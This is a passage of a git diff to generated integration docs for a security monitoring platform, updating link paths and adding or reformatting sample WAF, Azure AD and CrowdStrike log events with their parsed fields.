"correlationId": "26e7584c-876b-425f-9119-49b411e21365", - "conditionalAccessStatus": "notApplied", - "originalRequestId": "39e3a81e-99b9-4a30-8000-f38a970e5100", - "isInteractive": false, - "tokenIssuerName": "", - "tokenIssuerType": "AzureAD", - "processingTimeInMilliseconds": 101, - "riskDetail": "hidden", - "riskLevelAggregated": "hidden", - "riskLevelDuringSignIn": "hidden", - "riskState": "none", - "riskEventTypes": [], - "riskEventTypes_v2": [], - "resourceDisplayName": "Windows Azure Active Directory", - "resourceId": "00000002-0000-0000-c000-000000000000", - "resourceTenantId": "aa09a079-7796-46a8-a4d4-4d21b0dcf1b2", - "authenticationMethodsUsed": [], - "authenticationRequirement": "multiFactorAuthentication", - "alternateSignInName": null, - "servicePrincipalName": null, - "signInEventTypes": [], - "servicePrincipalId": "", - "status": { - "errorCode": 0, - "failureReason": "Other.", - "additionalDetails": "MFA requirement satisfied by claim in the token" - }, - "deviceDetail": { - "deviceId": "", - "displayName": null, - "operatingSystem": "Windows 10", - "browser": "Firefox 81.0", - "isCompliant": null, - "isManaged": null, - "trustType": null - }, - "location": { - "city": "Paris", - "state": "Paris", - "countryOrRegion": "FR", - "geoCoordinates": { - "altitude": null, - "latitude": 48.861000061035156, - "longitude": 2.3380000591278076 - } - }, - "mfaDetail": { - "authMethod": null, - "authDetail": null - }, - "appliedConditionalAccessPolicies": [], - "authenticationProcessingDetails": [ - { - "key": "Login Hint Present", - "value": "True" - }, - { - "key": "IsCAEToken", - "value": "False" - } - ], - "networkLocationDetails": [], - "authenticationDetails": [ - { - "authenticationStepDateTime": "2020-09-28T10:12:41.4104242Z", - "authenticationMethod": null, - "authenticationMethodDetail": null, - "succeeded": true, - "authenticationStepResultDetail": "MFA requirement satisfied by claim in the token", - "authenticationStepRequirement": "User" - } - ], - "authenticationRequirementPolicies": [] - } - ``` - - - === "change_user_password" diff --git a/_shared_content/operations_center/integrations/generated/1d172ee6-cdc0-4713-9cfd-43f7d9595777.md b/_shared_content/operations_center/integrations/generated/1d172ee6-cdc0-4713-9cfd-43f7d9595777.md index 4d46acb2df..4b911c47b2 100644 --- a/_shared_content/operations_center/integrations/generated/1d172ee6-cdc0-4713-9cfd-43f7d9595777.md +++ b/_shared_content/operations_center/integrations/generated/1d172ee6-cdc0-4713-9cfd-43f7d9595777.md @@ -22,7 +22,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "cisco_esa_cef.json" diff --git a/_shared_content/operations_center/integrations/generated/1df44c62-33d3-41d4-8176-f1fa13589eea.md b/_shared_content/operations_center/integrations/generated/1df44c62-33d3-41d4-8176-f1fa13589eea.md index cc31512514..ea5896cfbe 100644 --- a/_shared_content/operations_center/integrations/generated/1df44c62-33d3-41d4-8176-f1fa13589eea.md +++ b/_shared_content/operations_center/integrations/generated/1df44c62-33d3-41d4-8176-f1fa13589eea.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_1.json" diff --git a/_shared_content/operations_center/integrations/generated/20876735-c423-4bbc-9d19-67edc91fb063.md b/_shared_content/operations_center/integrations/generated/20876735-c423-4bbc-9d19-67edc91fb063.md index a23eecf3a7..a0dbc0aa21 100644 --- a/_shared_content/operations_center/integrations/generated/20876735-c423-4bbc-9d19-67edc91fb063.md +++ b/_shared_content/operations_center/integrations/generated/20876735-c423-4bbc-9d19-67edc91fb063.md @@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_audit_admin_event.json" diff --git a/_shared_content/operations_center/integrations/generated/2259adc3-9d93-4150-9c1c-46804e636084.md b/_shared_content/operations_center/integrations/generated/2259adc3-9d93-4150-9c1c-46804e636084.md index 7f1bae9329..f3cba3c92f 100644 --- a/_shared_content/operations_center/integrations/generated/2259adc3-9d93-4150-9c1c-46804e636084.md +++ b/_shared_content/operations_center/integrations/generated/2259adc3-9d93-4150-9c1c-46804e636084.md @@ -17,7 +17,87 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. + +=== "attack.json" + + ```json + + { + "message": "cat=attack date_time=2023-12-08T02:34:17+01:00 user_id=9a8d2e96-0d28-48ef-ac6c-8e23236e9eaf user_name=jdoe@example.org login_user=\"Unknown\" ep_id=5446331978 app_name=\"Staging\" ep_region=europe-west3 ep_domain=staging.example.org src_ip=1.2.3.4 src_port=45344 backend_service=unknown dst_port=443 srccountry=\"Ireland\" service=https/tls1.3 action=Block main_type=\"Known Bots Detection\" sub_type=\"Crawler\" threat_level=Moderate threat_weight=25 http_host=staging.example.org http_url=/ http_version=1.x http_method=GET http_agent=\"Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)\" http_refer=none length=1546 signature_id=N/A signature_cve_id=N/A owasp_top10=\"N/A\" msg=\"Known Bots: Malicious Bot Netcraft in category Crawler Violation\" log_id=20000213 msg_id=001415055359", + "event": { + "action": "Block", + "message": "Known Bots: Malicious Bot Netcraft in category Crawler Violation" + }, + "action": { + "properties": { + "cat": "attack", + "log_id": "20000213" + } + }, + "destination": { + "port": 443 + }, + "host": { + "name": "tyR4LrYORLPlEIBp" + }, + "http": { + "request": { + "method": "GET", + "referrer": "none" + }, + "version": "1.x" + }, + "log": { + "hostname": "tyR4LrYORLPlEIBp" + }, + "related": { + "hosts": [ + "staging.example.org" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "address": "1.2.3.4", + "geo": { + "name": "Ireland" + }, + "ip": "1.2.3.4", + "port": 45344 + }, + "url": { + "domain": "staging.example.org", + "path": "/", + "registered_domain": "example.org", + "subdomain": "staging", + "top_level_domain": "org", + "username": "jdoe@example.org" + }, + "user": { + "domain": "example.org", + "email": "jdoe@example.org", + "id": "9a8d2e96-0d28-48ef-ac6c-8e23236e9eaf", + "name": "jdoe" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)", + "os": { + "name": "Other" + } + } + } + + ``` + === "https_traffic.json" @@ -67,9 +147,15 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "protocol": "tcp" }, "related": { + "hosts": [ + "api.sns-security.fr" + ], "ip": [ "172.26.8.20", "192.168.36.2" + ], + "user": [ + "Unknown" ] }, "rule": { @@ -87,9 +173,16 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "cipher": "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384" }, "url": { + "domain": "api.sns-security.fr", "path": "/apiv1/wan/list?take=12&skip=84&orderBy=ponderationValue&sortDirection=desc&filter[]=monitor,equalsBool,true&filter[]=status,equal,DOWN", + "registered_domain": "sns-security.fr", + "subdomain": "api", + "top_level_domain": "fr", "username": "Unknown" }, + "user": { + "name": "Unknown" + }, "user_agent": { "device": { "name": "Other" @@ -155,6 +248,7 @@ The following table lists the fields that are extracted, normalized under the EC | Name | Type | Description | | ---- | ---- | ---------------------------| +|`action.properties.cat` | `keyword` | | |`action.properties.device_id` | `keyword` | | |`action.properties.log_id` | `keyword` | | |`destination.ip` | `ip` | IP address of the destination. | @@ -176,8 +270,12 @@ The following table lists the fields that are extracted, normalized under the EC |`source.ip` | `ip` | IP address of the source. | |`source.port` | `long` | Port of the source. | |`tls.cipher` | `keyword` | String indicating the cipher used during the current connection. | +|`url.domain` | `keyword` | Domain of the url. | |`url.path` | `wildcard` | Path of the request, such as "/search". | |`url.username` | `keyword` | Username of the request. | +|`user.domain` | `keyword` | Name of the directory the user is a member of. | +|`user.email` | `keyword` | User email address. | +|`user.id` | `keyword` | Unique identifier of the user. | |`user.name` | `keyword` | Short name or login of the user. | |`user_agent.original` | `keyword` | Unparsed user_agent string. | diff --git a/_shared_content/operations_center/integrations/generated/2259adc3-9d93-4150-9c1c-46804e636084_sample.md b/_shared_content/operations_center/integrations/generated/2259adc3-9d93-4150-9c1c-46804e636084_sample.md index 75df9b7a6b..e80daee7c3 100644 --- a/_shared_content/operations_center/integrations/generated/2259adc3-9d93-4150-9c1c-46804e636084_sample.md +++ b/_shared_content/operations_center/integrations/generated/2259adc3-9d93-4150-9c1c-46804e636084_sample.md @@ -4,6 +4,14 @@ In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. +=== "attack" + + ``` + cat=attack date_time=2023-12-08T02:34:17+01:00 user_id=9a8d2e96-0d28-48ef-ac6c-8e23236e9eaf user_name=jdoe@example.org login_user="Unknown" ep_id=5446331978 app_name="Staging" ep_region=europe-west3 ep_domain=staging.example.org src_ip=1.2.3.4 src_port=45344 backend_service=unknown dst_port=443 srccountry="Ireland" service=https/tls1.3 action=Block main_type="Known Bots Detection" sub_type="Crawler" threat_level=Moderate threat_weight=25 http_host=staging.example.org http_url=/ http_version=1.x http_method=GET http_agent="Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" http_refer=none length=1546 signature_id=N/A signature_cve_id=N/A owasp_top10="N/A" msg="Known Bots: Malicious Bot Netcraft in category Crawler Violation" log_id=20000213 msg_id=001415055359 + ``` + + + === "https_traffic" ``` diff --git a/_shared_content/operations_center/integrations/generated/22f2afd2-c858-443d-8e06-7b335e439c29.md b/_shared_content/operations_center/integrations/generated/22f2afd2-c858-443d-8e06-7b335e439c29.md index f57b02e1f5..ac714c0d1f 100644 --- a/_shared_content/operations_center/integrations/generated/22f2afd2-c858-443d-8e06-7b335e439c29.md +++ b/_shared_content/operations_center/integrations/generated/22f2afd2-c858-443d-8e06-7b335e439c29.md @@ -25,14 +25,14 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "auth_activity_audit.json" ```json { - "message": "{\"metadata\":{\"customerIDString\":\"46de5283260647ec8f28def00bffd094\",\"offset\":6755,\"eventType\":\"AuthActivityAuditEvent\",\"eventCreationTime\":1657663146099,\"version\":\"1.0\"},\"event\":{\"UserId\":\"foo.bar@sekoia.fr\",\"UserIp\":\"83.199.26.17\",\"OperationName\":\"twoFactorAuthenticate\",\"ServiceName\":\"CrowdStrike Authentication\",\"Success\":true,\"UTCTimestamp\":1657663146099}}", + "message": "{\"metadata\": {\"customerIDString\": \"46de5283260647ec8f28def00bffd094\", \"offset\": 6755, \"eventType\": \"AuthActivityAuditEvent\", \"eventCreationTime\": 1657663146099, \"version\": \"1.0\"}, \"event\": {\"UserId\": \"foo.bar@sekoia.fr\", \"UserIp\": \"83.199.26.17\", \"OperationName\": \"twoFactorAuthenticate\", \"ServiceName\": \"CrowdStrike Authentication\", \"Success\": true, \"UTCTimestamp\": 1657663146099}}", "event": { "category": [ "configuration" @@ -71,7 +71,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"metadata\":{\"customerIDString\":\"46de5283260647ec8f28def00bffd094\",\"offset\":189,\"eventType\":\"DetectionSummaryEvent\",\"eventCreationTime\":1657174538000,\"version\":\"1.0\"},\"event\":{\"ProcessStartTime\":1656688889,\"ProcessEndTime\":0,\"ProcessId\":22164474048,\"ParentProcessId\":22163465296,\"ComputerName\":\"nsewmkzevukn-vm\",\"UserName\":\"Administrator\",\"DetectName\":\"Overwatch Detection\",\"DetectDescription\":\"Falcon Overwatch has identified malicious activity carried out by a suspected or known eCrime operator. This activity has been raised for critical action and should be investigated urgently.\",\"Severity\":5,\"SeverityName\":\"Critical\",\"FileName\":\"explorer.exe\",\"FilePath\":\"\\\\Device\\\\HarddiskVolume2\\\\Windows\",\"CommandLine\":\"C:\\\\Windows\\\\Explorer.EXE\",\"SHA256String\":\"249cb3cb46fd875196e7ed4a8736271a64ff2d8132357222a283be53e7232ed3\",\"MD5String\":\"d45bd7c7b7bf977246e9409d63435231\",\"SHA1String\":\"0000000000000000000000000000000000000000\",\"MachineDomain\":\"nsewmkzevukn-vm\",\"HostGroups\": \"6252fc7505974dc38abfef73269b8deb,b3365faa2fe44893b3c2c6b3bfbf6650,e114797a97894ed3bfd6442ef7eead92,1cd4a1385cac4db1a4d5f4d7ce035b65,2faa12f2f1e046f2bc21cad5d01ae723,37f2ae7c641845a4918f4348a52b4874\"}}", + "message": "{\"metadata\": {\"customerIDString\": \"46de5283260647ec8f28def00bffd094\", \"offset\": 189, \"eventType\": \"DetectionSummaryEvent\", \"eventCreationTime\": 1657174538000, \"version\": \"1.0\"}, \"event\": {\"ProcessStartTime\": 1656688889, \"ProcessEndTime\": 0, \"ProcessId\": 22164474048, \"ParentProcessId\": 22163465296, \"ComputerName\": \"nsewmkzevukn-vm\", \"UserName\": \"Administrator\", \"DetectName\": \"Overwatch Detection\", \"DetectDescription\": \"Falcon Overwatch has identified malicious activity carried out by a suspected or known eCrime operator. This activity has been raised for critical action and should be investigated urgently.\", \"Severity\": 5, \"SeverityName\": \"Critical\", \"FileName\": \"explorer.exe\", \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\Windows\", \"CommandLine\": \"C:\\\\Windows\\\\Explorer.EXE\", \"SHA256String\": \"249cb3cb46fd875196e7ed4a8736271a64ff2d8132357222a283be53e7232ed3\", \"MD5String\": \"d45bd7c7b7bf977246e9409d63435231\", \"SHA1String\": \"0000000000000000000000000000000000000000\", \"MachineDomain\": \"nsewmkzevukn-vm\", \"HostGroups\": \"6252fc7505974dc38abfef73269b8deb,b3365faa2fe44893b3c2c6b3bfbf6650,e114797a97894ed3bfd6442ef7eead92,1cd4a1385cac4db1a4d5f4d7ce035b65,2faa12f2f1e046f2bc21cad5d01ae723,37f2ae7c641845a4918f4348a52b4874\"}}", "event": { "category": [ "intrusion_detection" @@ -140,7 +140,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"metadata\":{\"customerIDString\":\"44be50f58ccfcfcfcfcfcfcfcffc\",\"offset\":111111,\"eventType\":\"DetectionSummaryEvent\",\"eventCreationTime\":1682930000000,\"version\":\"1.0\"},\"event\":{\"ProcessStartTime\":1682930000000,\"ProcessEndTime\":1682930000000,\"ProcessId\":1682930000000,\"ParentProcessId\":1682930000000,\"ComputerName\":\"ComputerName\",\"UserName\":\"Username\",\"DetectName\":\"DetectName\",\"DetectDescription\":\"This file meets the Adware/PUP Anti-malware ML algorithms high-confidence threshold.\",\"Severity\":2,\"SeverityName\":\"Low\",\"FileName\":\"Setup_test.exe\",\"FilePath\":\"\\\\Device\\\\Downloads\",\"CommandLine\":\"\\\"C:\\\\Setup_test.exe\\\" \",\"SHA256String\":\"76da317a8e17b7d773f09e3a7487\",\"MD5String\":\"b97cdbe4a9b032\",\"SHA1String\":\"00000000000000000\",\"MachineDomain\":\"AD\",\"FalconHostLink\":\"https://test.com/activity/\",\"SensorId\":\"c9794942866f428\",\"IOCType\":\"hash_sha256\",\"IOCValue\":\"76da317a8e17b7d773f09e3a748782e\",\"DetectId\":\"ldt:c9794942866f:26628996\",\"QuarantineFiles\":[{\"ImageFileName\":\"\\\\Device\\\\Setup_test.exe\",\"SHA256HashData\":\"76da317a8e17b7d773f09e\"}],\"LocalIP\":\"1.2.3.4\",\"MACAddress\":\"00-01-02-03-04-05\",\"Tactic\":\"Machine Learning\",\"Technique\":\"Adware/PUP\",\"Objective\":\"Falcon Detection Method\",\"PatternDispositionDescription\":\"Prevention/Quarantine, process was blocked from execution and quarantine was attempted.\",\"PatternDispositionValue\":2222,\"PatternDispositionFlags\":{\"Indicator\":false,\"Detect\":false,\"InddetMask\":false,\"SensorOnly\":false,\"Rooting\":false,\"KillProcess\":false,\"KillSubProcess\":false,\"QuarantineMachine\":false,\"QuarantineFile\":true,\"PolicyDisabled\":false,\"KillParent\":false,\"OperationBlocked\":false,\"ProcessBlocked\":true,\"RegistryOperationBlocked\":false,\"CriticalProcessDisabled\":false,\"BootupSafeguardEnabled\":false,\"FsOperationBlocked\":false,\"HandleOperationDowngraded\":false,\"KillActionFailed\":false,\"BlockingUnsupportedOrDisabled\":false,\"SuspendProcess\":false,\"SuspendParent\":false},\"ParentImageFileName\":\"\\\\Device\\\\test.exe\",\"ParentCommandLine\":\"\\\"C:\\\\Program Files (x86)\\\\test.exe\\\" \",\"GrandparentImageFileName\":\"\\\\Device\\\\test.exe\",\"GrandparentCommandLine\":\"test.exe\",\"AssociatedFile\":\"\\\\Device\\\\test.exe\",\"PatternId\":5555}}", + "message": "{\"metadata\": {\"customerIDString\": \"44be50f58ccfcfcfcfcfcfcfcffc\", \"offset\": 111111, \"eventType\": \"DetectionSummaryEvent\", \"eventCreationTime\": 1682930000000, \"version\": \"1.0\"}, \"event\": {\"ProcessStartTime\": 1682930000000, \"ProcessEndTime\": 1682930000000, \"ProcessId\": 1682930000000, \"ParentProcessId\": 1682930000000, \"ComputerName\": \"ComputerName\", \"UserName\": \"Username\", \"DetectName\": \"DetectName\", \"DetectDescription\": \"This file meets the Adware/PUP Anti-malware ML algorithms high-confidence threshold.\", \"Severity\": 2, \"SeverityName\": \"Low\", \"FileName\": \"Setup_test.exe\", \"FilePath\": \"\\\\Device\\\\Downloads\", \"CommandLine\": \"\\\"C:\\\\Setup_test.exe\\\" \", \"SHA256String\": \"76da317a8e17b7d773f09e3a7487\", \"MD5String\": \"b97cdbe4a9b032\", \"SHA1String\": \"00000000000000000\", \"MachineDomain\": \"AD\", \"FalconHostLink\": \"https://test.com/activity/\", \"SensorId\": \"c9794942866f428\", \"IOCType\": \"hash_sha256\", \"IOCValue\": \"76da317a8e17b7d773f09e3a748782e\", \"DetectId\": \"ldt:c9794942866f:26628996\", \"QuarantineFiles\": [{\"ImageFileName\": \"\\\\Device\\\\Setup_test.exe\", \"SHA256HashData\": \"76da317a8e17b7d773f09e\"}], \"LocalIP\": \"1.2.3.4\", \"MACAddress\": \"00-01-02-03-04-05\", \"Tactic\": \"Machine Learning\", \"Technique\": \"Adware/PUP\", \"Objective\": \"Falcon Detection Method\", \"PatternDispositionDescription\": \"Prevention/Quarantine, process was blocked from execution and quarantine was attempted.\", \"PatternDispositionValue\": 2222, \"PatternDispositionFlags\": {\"Indicator\": false, \"Detect\": false, \"InddetMask\": false, \"SensorOnly\": false, \"Rooting\": false, \"KillProcess\": false, \"KillSubProcess\": false, \"QuarantineMachine\": false, \"QuarantineFile\": true, \"PolicyDisabled\": false, \"KillParent\": false, \"OperationBlocked\": false, \"ProcessBlocked\": true, \"RegistryOperationBlocked\": false, \"CriticalProcessDisabled\": false, \"BootupSafeguardEnabled\": false, \"FsOperationBlocked\": false, \"HandleOperationDowngraded\": false, \"KillActionFailed\": false, \"BlockingUnsupportedOrDisabled\": false, \"SuspendProcess\": false, \"SuspendParent\": false}, \"ParentImageFileName\": \"\\\\Device\\\\test.exe\", \"ParentCommandLine\": \"\\\"C:\\\\Program Files (x86)\\\\test.exe\\\" \", \"GrandparentImageFileName\": \"\\\\Device\\\\test.exe\", \"GrandparentCommandLine\": \"test.exe\", \"AssociatedFile\": \"\\\\Device\\\\test.exe\", \"PatternId\": 5555}}", "event": { "category": [ "intrusion_detection" @@ -159,14 +159,20 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "severity_name": "Low" }, "file": { + "directory": "\\Device", "hash": { "md5": "b97cdbe4a9b032", "sha256": "76da317a8e17b7d773f09e3a7487" - } + }, + "name": "test.exe" }, "host": { - "ip": "1.2.3.4", - "mac": "00-01-02-03-04-05", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-01-02-03-04-05" + ], "name": "ComputerName" }, "log": { @@ -229,7 +235,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"metadata\":{\"customerIDString\":\"46de5283260647ec8f28def00bffd094\",\"offset\":733,\"eventType\":\"UserActivityAuditEvent\",\"eventCreationTime\":1657614940000,\"version\":\"1.0\"},\"event\":{\"UserId\":\"foo.bar@sekoia.fr\",\"UserIp\":\"185.162.177.26\",\"OperationName\":\"detection_update\",\"ServiceName\":\"detections\",\"AuditKeyValues\":[{\"Key\":\"detection_id\",\"ValueString\":\"ldt:5418788591a444d1b45c2b39d3b07b50:21483381998\"},{\"Key\":\"new_state\",\"ValueString\":\"closed\"},{\"Key\":\"assigned_to\",\"ValueString\":\"Erwan Chevalier\"},{\"Key\":\"assigned_to_uid\",\"ValueString\":\"foo.bar@sekoia.fr\"}],\"UTCTimestamp\":1657614940}}", + "message": "{\"metadata\": {\"customerIDString\": \"46de5283260647ec8f28def00bffd094\", \"offset\": 733, \"eventType\": \"UserActivityAuditEvent\", \"eventCreationTime\": 1657614940000, \"version\": \"1.0\"}, \"event\": {\"UserId\": \"foo.bar@sekoia.fr\", \"UserIp\": \"185.162.177.26\", \"OperationName\": \"detection_update\", \"ServiceName\": \"detections\", \"AuditKeyValues\": [{\"Key\": \"detection_id\", \"ValueString\": \"ldt:5418788591a444d1b45c2b39d3b07b50:21483381998\"}, {\"Key\": \"new_state\", \"ValueString\": \"closed\"}, {\"Key\": \"assigned_to\", \"ValueString\": \"Erwan Chevalier\"}, {\"Key\": \"assigned_to_uid\", \"ValueString\": \"foo.bar@sekoia.fr\"}], \"UTCTimestamp\": 1657614940}}", "event": { "category": [ "configuration" @@ -269,7 +275,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"metadata\":{\"detectionIdString\":\"ldt:9ed90be65f99456c9361141f8cfa39ab:17212155109\",\"eventType\":\"Vertex\",\"edge\":{\"sourceVertexId\":\"pid:9ed90be65f99456c9361141f8cfa39ab:17326818154\",\"type\":\"device\"},\"severity\":{\"name\":\"Critical\",\"code\":5}},\"event\":{\"id\":\"aid:9ed90be65f99456c9361141f8cfa39ab:9ed90be65f99456c9361141f8cfa39ab\",\"customer_id\":\"5d505aca55a145b3bd234c399201f082\",\"scope\":\"device\",\"object_id\":\"9ed90be65f99456c9361141f8cfa39ab\",\"device_id\":\"9ed90be65f99456c9361141f8cfa39ab\",\"vertex_type\":\"device\",\"timestamp\":\"2022-07-28T15:09:51Z\",\"properties\":{\"AgentLoadFlags\":\"0\",\"AgentLocalTime\":\"2022-07-24T20:09:35.793Z\",\"AgentVersion\":\"6.39.15316.0\",\"BaseTime\":\"663896169\",\"BiosManufacturer\":\"American Megatrends Inc.\",\"BiosReleaseDate\":\"12/07/2018\",\"BiosVersion\":\"090008 \",\"BootArgs\":\" NOEXECUTE=OPTIN REDIRECT\",\"BootId\":\"7\",\"BootStatusDataAabEnabled\":\"0\",\"BootStatusDataBootAttemptCount\":\"1\",\"BootStatusDataBootGood\":\"1\",\"BootStatusDataBootShutdown\":\"0\",\"BuildNumber\":\"19042\",\"BuildType\":\"3\",\"ChasisManufacturer\":\"Microsoft Corporation\",\"ChassisType\":\"3\",\"CheckedBuild\":\"0\",\"ComputerName\":\"mycomputer\",\"ConfigBuild\":\"1007.3.0015316.10\",\"ConfigIDBase\":\"65994762\",\"ConfigIDBuild\":\"15316\",\"ConfigIDPlatform\":\"3\",\"ConfigStateHash\":\"2445437569\",\"ConfigurationVersion\":\"10\",\"ConnectTime\":\"2022-07-18T09:47:48.602Z\",\"ConnectType\":\"8\",\"ConnectionCipher\":\"26126\",\"ConnectionCipherStrength\":\"128\",\"ConnectionExchange\":\"44550\",\"ConnectionExchangeStrength\":\"255\",\"ConnectionHash\":\"32780\",\"ConnectionHashStrength\":\"0\",\"ConnectionProtocol\":\"2048\",\"ContextTimeStamp\":\"2022-07-24T20:09:35.793Z\",\"CpuFeaturesMask\":\"7037767758369539\",\"CpuSignature\":\"263921\",\"CpuVendor\":\"0\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"FailedConnectCount\":\"0\",\"InstanceMetadataProvider\":\"2\",\"LocalAddressIP4\":\"1.2.3.4\",\"MachineDomain\":\"\",\"MajorVersion\":\"10\",\"MicrocodeSignature\":\"18446744069414584320\",\"MinorVersion\":\"0\",\"MoboManufacturer\":\"Microsoft Corporation\",\"MoboProductName\":\"Virtual Machine\",\"NetworkContainmentState\":\"0\",\"PhysicalAddress\":\"3a-c7-6c-b1-81-38\",\"PlatformId\":\"2\",\"PlatformSecuritySettings\":\"0\",\"PlatformSecurityStatus\":\"4294967296\",\"PointerSize\":\"8\",\"PreviousConnectTime\":\"1601-01-01T00:00:00.000Z\",\"ProductSku\":\"48\",\"ProductType\":\"1\",\"ProvisionState\":\"1\",\"RFMState\":\"0\",\"ServicePackMajor\":\"0\",\"ServicePackMinor\":\"0\",\"SideChannelMitigationFlags\":\"29444\",\"SubBuildNumber\":\"1706\",\"SuiteMask\":\"272\",\"SystemManufacturer\":\"Microsoft Corporation\",\"SystemProductName\":\"Virtual Machine\",\"SystemSerialNumber\":\"0000-0010-2562-7523-7070-7191-32\",\"SystemSku\":\"\",\"TargetFileName\":\"Config.sys\",\"accountId\":\"35f882a7-80ce-4e98-9efb-56f2382b6856\",\"eventPlatformId\":\"0\",\"externalIpAddress\":\"4.3.2.1\",\"instanceId\":\"9ed90be6-5f99-456c-9361-141f8cfa39ab\",\"zone_group\":\"rdp-east-us\"},\"edges\":{\"assigned_ipv4_address\":[{\"path\":\"http://falconapi.crowdstrike.com/threatgraph/combined/ipv4/summary/v1?ids=ip4%3A10.0.4.4%3A10.0.4.4&scope=device\",\"id\":\"ip4:10.0.4.4:10.0.4.4\",\"device_id\":\"10.0.4.4\",\"customer_id\":\"46de5283260647ec8f28def00bffd094\",\"object_id\":\"10.0.4.4\",\"direction\":\"out\",\"edge_id\":\"KZZ\\\"V__;Kgi>WZVP5\\\\Ro9MfM']Tc5[VP:C5\\\\od;.hXFhKNnO.RVWpq2h-EaR=a8J)%**N1p(udPF_<1'[/;7\\\\Xnd4%Ia%E3,C4j![?=r-0%.O=l!%&[$5=-si;lF2!Z\\\"2?31i[c/pMsGcTg;'O\\\"n,%Ot`@k^R;>'_r\\\"+3`-a]]Rj_09,,cO],pXWF.4E@m!!*'!\",\"source_vertex_id\":\"aid:835449907c99453085a924a16e967be5:835449907c99453085a924a16e967be5\",\"scope\":\"device\",\"edge_type\":\"established_user_session\",\"timestamp\":\"2022-07-18T09:50:33Z\",\"properties\":{\"LogonTime\":\"2022-07-18T09:35:03.448Z\",\"LogonType\":\"5\",\"UserIsAdmin\":\"0\",\"UserName\":\"hbmwcsfghmml-vm$\",\"UserPrincipal\":\"\"}},{\"path\":\"http://falconapi.crowdstrike.com/threatgraph/combined/user-sessions/summary/v1?ids=uses%3A835449907c99453085a924a16e967be5%3AS-1-5-90-0-1%7C83212&scope=device\",\"id\":\"uses:835449907c99453085a924a16e967be5:S-1-5